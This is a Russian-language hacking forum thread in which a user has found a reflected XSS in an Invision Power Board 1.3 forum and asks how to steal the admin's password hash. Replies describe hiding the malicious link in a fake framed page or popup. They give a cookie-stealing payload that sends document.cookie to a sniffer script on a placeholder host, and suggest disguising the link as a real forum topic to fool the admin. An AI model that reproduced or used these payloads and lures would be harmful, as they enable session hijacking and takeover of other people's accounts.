Вопрос про использование xss в Invision Power Board 1.3(U) Final

Кароче есть сайт http://victim.com/
На нём расположен форум Invision Power Board 1.3(U) Final
Нашёл XSS:http://victim.com/?c='><script>alert(document.cookie)</script><plaintext>

Пожалуйста объясните как я могу заполучить хэш админа.
Если надо вставить код со снифером,то пожалуйста напишите какойи куда вставлять...

 

Что-то сайт какой-то странный, рисуночек такой "Go Away!"

 

WizART - так просто, типа, обозначают сайт жертву. Victim - жертва. Типа тоже самое: www.жертва.com
...
Это пассивная XSS. Поэтому надо лепить липовую (фэйковую) страницу построенную на фреймах (или окно будет новое открываться) и там уже будет ссылка на эту XSS.

 

Фэйковый - липовый
Делай сайт на фреймах - левый нулевой, правый 100% (или просто iframe используй с шириной/высотой 0) тот который 100% будет типа липы. Можешь туда забабахать какое-нить изображение. В фрамесете путь до левого будет примерно такой:

+ в самом фрамесете подстра***ся и влепи код (но работать будет тока в ИЕ)

Чтобы большинство не видело что идет загрузка с другого сайта.
...
Можешь еще открыть новое Попап окно без статуса, прокрутки и т.п. и там какую-нить липовую рекламу поместить, но у некоторых может стоять резалка (или файервол) на открытие новых окон и обрубиться.

 

в IPB 1.3 проще хэш сплойтом утянуть чем с xss париться.

 

Grrl, ну не скажи... с некоторых 1.3 Final и"Русского модифицированного"
мне сплоиты не вытягивали хэши

 

Дак тебе не кто и негарантировал что сплойты на всех форумах работать будут...

 

Вы от куда попадали ? тутанхамоны наши =)

 

хы, сказать так: Смотри какую я тему намутил и ссылку (http://victim.com/?c='><script>img = new Image(); img.src = 'http://путь_до_снифера.ru/snifer.php?'+document.cookie;</script>). название ссылки - путь до реальной темы на форуме (для реальности), а адрес ссылки - xss . Не пинайте сильно . Если админ лох - прокатит